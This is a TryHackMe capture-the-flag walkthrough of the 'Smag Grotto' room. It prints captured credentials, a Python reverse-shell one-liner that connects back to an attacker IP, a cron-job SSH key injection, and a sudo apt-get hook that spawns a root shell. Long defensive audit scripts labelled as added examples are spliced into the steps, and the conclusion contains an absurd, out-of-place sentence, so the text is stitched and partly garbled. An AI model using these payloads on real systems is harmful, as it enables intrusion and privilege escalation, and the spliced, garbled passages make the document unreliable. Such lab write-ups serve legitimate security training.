Tryhackme - Smag Grotto

In this walkthrough, we will go through the Smag Grotto room from TryHackMe. The room is rated Easy on the platform and covers enumeration, Wireshark pcap analysis, cron job abuse and privilege escalation. So, let’s get started without any delay.

Smag Grotto

Machine Info:

Title: Smag Grotto
IP address: 10.10.71.178
Difficulty: Easy
Objective: Deploy the machine and get root privileges.

Enumeration:

  • I started with a regular nmap scan with service version detection and found two open ports – 80 (HTTP) and 22 (SSH).

sudo nmap -sS -sV 10.10.71.178

nmap scan

  • Next, fired up gobuster against the web server on port 80 and found a directory named /mail.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.71.178/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.71.178/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/18 22:59:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 402]
/mail                 (Status: 301) [Size: 311] [--> http://10.10.71.178/mail/]
/server-status        (Status: 403) [Size: 277]                                
                                                                               
===============================================================
2023/11/18 23:01:19 Finished
===============================================================

gobuster scan

  • The directory holds copies of the emails exchanged between the server’s admins, and they reference a pcap file for analysis. The last email contains a note instructing us to download the pcap file via wget.

Network Migration email

Re: Network Migration

  • Used wget to download the file on my local machine for further inspection.

wget http://10.10.71.178/aW1wb3J0YW50/dHJhY2Uy.pcap

wget pcap file

  • Loaded the pcap file in Wireshark and followed the HTTP stream. Found a username and password combination in a login request to an internal server named development.smag.thm.

Wireshark

Wireshark HTTP stream
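The check above was done by hand in Wireshark: follow the HTTP stream and spot a password sent in cleartext. The script below is an added example, not code from the room or the walkthrough, that automates the same check from a defender's side: a minimal pure-Python reader for classic little-endian pcap files with Ethernet/IPv4/TCP frames that reassembles each client-to-server stream, finds HTTP POST bodies, and reports which credential-looking form fields crossed the wire unencrypted. Every packet is constructed in build_sample_pcap(); only the hostname development.smag.thm and the username helpdesk are taken from the walkthrough, and the password value is a placeholder.

```python
"""Flag cleartext HTTP logins in a pcap (added example; all packets are constructed)."""
import struct
from urllib.parse import parse_qs

CREDENTIAL_FIELDS = {"password", "passwd", "pass", "pwd", "secret", "token"}


def pcap_records(data: bytes):
    """Yield raw frame bytes from a little-endian classic pcap (magic 0xa1b2c3d4, Ethernet)."""
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("expected a little-endian classic pcap")
    if struct.unpack_from("<I", data, 20)[0] != 1:  # LINKTYPE_ETHERNET
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from("<IIII", data, off)[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, or None otherwise."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != 6:  # IP protocol 6 is TCP
        return None
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack_from("!HH", tcp, 0)
    data_off = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[data_off:]


def find_cleartext_credentials(pcap: bytes):
    """Report POST requests whose form body carries a credential-looking field name."""
    streams = {}
    for frame in pcap_records(pcap):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        # Segments are appended in capture order; a production tool must order them by TCP seq.
        streams.setdefault((src, sport, dst, dport), bytearray()).extend(payload)
    findings = []
    for (src, sport, dst, dport), buf in streams.items():
        head, sep, body = bytes(buf).partition(b"\r\n\r\n")
        if not sep or not head.startswith(b"POST "):
            continue
        request_line, *header_lines = head.decode("latin-1").split("\r\n")
        headers = dict(h.split(": ", 1) for h in header_lines if ": " in h)
        fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        leaked = sorted(f for f in fields if f.lower() in CREDENTIAL_FIELDS)
        if leaked:
            findings.append({
                "flow": f"{src}:{sport} -> {dst}:{dport}",
                "host": headers.get("Host", "?"),
                "request": request_line,
                "fields": leaked,  # field names only; the values are never reported
            })
    return findings


def _frame(src, sport, dst, dport, payload: bytes) -> bytes:
    """Build a bare Ethernet/IPv4/TCP frame for the sample (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + struct.pack("!H", 0x0800) + ip + tcp


def build_sample_pcap() -> bytes:
    """Constructed capture: one cleartext login POST split over two segments, plus a benign GET."""
    login = (b"POST /login.php HTTP/1.1\r\nHost: development.smag.thm\r\n"
             b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 34\r\n\r\n"
             b"username=helpdesk&password=example")  # placeholder value, not the room's password
    frames = [
        _frame("192.168.56.20", 50000, "192.168.56.10", 80, login[:60]),
        _frame("192.168.56.20", 50000, "192.168.56.10", 80, login[60:]),
        _frame("192.168.56.20", 50001, "192.168.56.10", 80,
               b"GET /index.php HTTP/1.1\r\nHost: development.smag.thm\r\n\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for hit in find_cleartext_credentials(build_sample_pcap()):
        print(f"{hit['flow']}  {hit['host']}  {hit['request']}  fields={hit['fields']}")
```

The finding deliberately reports only the field names, not the values: the point of the check is to prove that a login form is served over plain HTTP (the fix is TLS on the development host), not to harvest what was typed into it.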

  • To reach the development server that the login request in the HTTP stream was sent to, we have to add its hostname to our /etc/hosts file.

helpdesk:cH4nG3M3_n0w

edit /etc/hosts file

  • Once /etc/hosts is configured, we can access the server. It contains a link to a login panel, which we can access with the credentials we found.

development.smag.thm

Admin login panel

  • Once logged in, we are presented with a shell interface where we can enter commands. I tried a variety of commands but could not see any output in the frontend. Next, I also tried to log in to the server via SSH with the found credentials but had no luck.

Enter a command

ssh login attempt

Initial Access:

  • I then tried to get a reverse shell with the below payload and, luckily, this time got a connection back to our netcat listener.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python reverse shell

netcat listener

permission denied

  • Next, to access the user flag we have to escalate our privileges to user jake. So, I ran linpeas on the machine, and an interesting cron job caught my attention: a backup copy of jake’s SSH public key is kept on the system, and a cron job copies the contents of that backup file into the authorized_keys file in jake’s .ssh directory.

linpeas output

  • I checked the permissions on the backup file and found that we can both read and write it. Bingo!

jake_id_rsa.pub.backup
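The weakness here is not the cron job itself but the permissions on its input: a root job copies a file that any local user can rewrite into jake’s authorized_keys, so whoever can write the backup decides who may log in as jake. The script below is an added example, not code from the room or the walkthrough, that audits this class of misconfiguration from the defender’s side: it parses /etc/crontab-style lines, extracts the absolute paths each root job references, and flags any that are group- or world-writable. The crontab text and the files are constructed in a temporary directory so the audit runs offline; the file names only mirror the walkthrough.

```python
"""Audit crontab jobs for input files that non-root users can modify (added example)."""
import os
import re
import stat
import tempfile

PATH_RE = re.compile(r"/[^\s;&|<>]+")  # absolute paths inside a command string


def writable_by_others(path: str) -> bool:
    """True when the group or world write bit is set on the file the path resolves to."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def parse_crontab(text: str):
    """Yield (user, command) from system crontab lines: five time fields, user, command."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or an environment assignment such as SHELL=/bin/sh
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]


def audit_crontab(text: str):
    """Return one finding per path in a root job that exists and is writable by other users."""
    findings = []
    for user, command in parse_crontab(text):
        if user != "root":
            continue  # only jobs that run with root's privileges matter for this check
        for path in PATH_RE.findall(command):
            if os.path.exists(path) and writable_by_others(path):
                findings.append({"command": command, "path": path})
    return findings


def build_sample(tmpdir: str) -> str:
    """Create the constructed files under tmpdir and return a crontab that references them."""
    ssh_dir = os.path.join(tmpdir, ".ssh")
    os.makedirs(ssh_dir)
    backup = os.path.join(tmpdir, "jake_id_rsa.pub.backup")
    auth = os.path.join(ssh_dir, "authorized_keys")
    for p in (backup, auth):
        open(p, "w").close()
    os.chmod(backup, 0o666)  # the weak setting: any local user can rewrite the key that cron installs
    os.chmod(auth, 0o600)    # the corrected setting; the backup should be owner-writable only as well
    return (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"* * * * * root /bin/cp {backup} {auth}\n"
        f"0 3 * * * jake /bin/tar czf {tmpdir}/home.tgz {tmpdir}\n"
    )


def demo():
    """Run the audit against the constructed setup and return the findings list."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_crontab(build_sample(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"writable by others: {f['path']}\n  used by root job:   {f['command']}")
```

On a real host the same audit would read /etc/crontab and the files under /etc/cron.d, and would also check the directories containing each path, since a writable parent directory lets a user replace the file even when the file itself is locked down.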

  • That means we can add our own public key to the backup file, and once the cron job runs we can access the server via SSH as jake with our private key. So, I generated an SSH key pair on my local machine using ssh-keygen.

ssh-keygen

ssh-keygen

  • Next, I copied the public key into the jake_id_rsa.pub.backup file.

cat jake.pub

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXafOG9d6uI0bGBY6+4pwaOaKglkfJgbA/PAAazPaz+28HxC1rOxzc8aykUGKKta7qk3Umqs9S/WtzikPwB88fOAGj05LxtTE2Xl8xWNU9mhwJ1xuQFqJJBeT0ia1/0NRiYPao15QkgWjROsTWfgD2YL0jawwkkLzG5idQ+OevEAoSt2RYcG3oFm1kvtZZuM3oNYlFYehbkF495nkC0iRITECxSyvliOsRPTlndfGS4IGEiAMcUW9kqQMKRCpCw8az1IkYln3jMTZNUopx2uE0dIbXQO88YcMWyEhF9LWMECJDkxHUHaa2YCuxxeCiYpF9RK/P8I3cYP+f/Ws5FVu285TD3BoLMnup3yoY1hbs0Z9t2JEaDaPRl3JcjuMC/YSeLhiIqETDCAxLwMC0j/9KoslVBQ+NCIGwFfIQE56cbwS2xXMFpEE0Xj3nhxpq3n+L8YS2WMUS5BcC99i1b/cYl+Kmbll5u6uTaDmlDNSJTlk3AOM1tkvq9wAfwjkAD7s= wh1terose@fsociety' > jake_id_rsa.pub.backup

copy public key to jake backup

  • Logged in successfully as user jake with the generated private key and got the user flag.

ssh login jake

user flag

Privilege Escalation:

  • Next, checked the sudo permissions for user jake and found that he can run the apt-get binary as root without a password.

sudo -l

sudo -l

  • Used the GTFOBins entry for apt-get to exploit the binary and got the root flag.

GTFObins apt-get exploit

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

root flag
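The sudo rule above is the whole privilege escalation: apt-get honours -o APT::Update::Pre-Invoke hooks, so a NOPASSWD rule for it is equivalent to a NOPASSWD root shell. The script below is an added example, not code from the room or the walkthrough, that rates sudoers rules (the same information sudo -l prints) from the defender’s side: rules that still require a password are informational, any NOPASSWD rule is a warning, and a NOPASSWD rule for ALL or for apt-get is critical. The rules in SAMPLE_SUDOERS are constructed; only jake’s entry mirrors the room.

```python
"""Rate sudoers rules by how close a NOPASSWD entry is to a root shell (added example)."""
import os
import re

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
# Binaries that run caller-supplied hooks as root; apt-get is the one used in the walkthrough.
HOOK_RUNNERS = {"apt-get", "apt"}
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text: str):
    """Yield one dict per user rule; Defaults and alias lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments, including trailing ones
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        yield {
            "user": m.group("user"),
            "runas": (m.group("runas") or "root").strip(),  # sudoers defaults to root
            "tags": {t.strip(": ") for t in m.group("tags").split()},
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        }


def rate(rule) -> str:
    """info: password required; warning: NOPASSWD; critical: NOPASSWD and effectively a root shell."""
    if "NOPASSWD" not in rule["tags"]:
        return "info"
    if "ALL" in rule["commands"]:
        return "critical"
    for cmd in rule["commands"]:
        if os.path.basename(cmd.split()[0]) in HOOK_RUNNERS:
            return "critical"
    return "warning"


def audit_sudoers(text: str):
    """Return [{'user', 'commands', 'rating'}, ...] for every rule in the text."""
    return [{"user": r["user"], "commands": r["commands"], "rating": rate(r)}
            for r in parse_sudoers(text)]


# Constructed sudoers content; jake's line is the rule from the room, the others are made up.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
jake    ALL=(ALL) NOPASSWD: /usr/bin/apt-get
ops     ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx   # constructed rule
dev     ALL=(ALL) /usr/bin/systemctl restart nginx             # constructed rule
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{finding['rating']:8} {finding['user']:6} {', '.join(finding['commands'])}")
```

Restricting the rule to a sub-command such as apt-get update would not help, because the -o override is still accepted; the remediation is to drop the NOPASSWD grant for package managers altogether and give the user a fixed wrapper script that takes no arguments.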

Task 1 – Smag Grotto

Question 1 – What is the user flag?

Question 2 – What is the root flag?

Conclusion:

So that was “Smag Grotto” for you. We started with our regular nmap scan and found two open ports – 80 (HTTP) and 22 (SSH). Next, we ran gobuster against the web server and found a directory named /mail holding copies of emails exchanged between the server’s admins, where we found a pcap file. We downloaded the pcap using wget and loaded it in Wireshark for further inspection, where we found a username and password in an HTTP stream. We used them to log in to the development server at development.smag.thm and used its command shell functionality to get a reverse shell connection back to our netcat listener. Next, we abused a cron job by adding our generated SSH public key to the backup file that it copies into jake’s .ssh directory, and got access as jake using our private key. At last, we exploited the sudo permissions for apt-get to get the root flag and the permission to cheat on my dead wife. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.
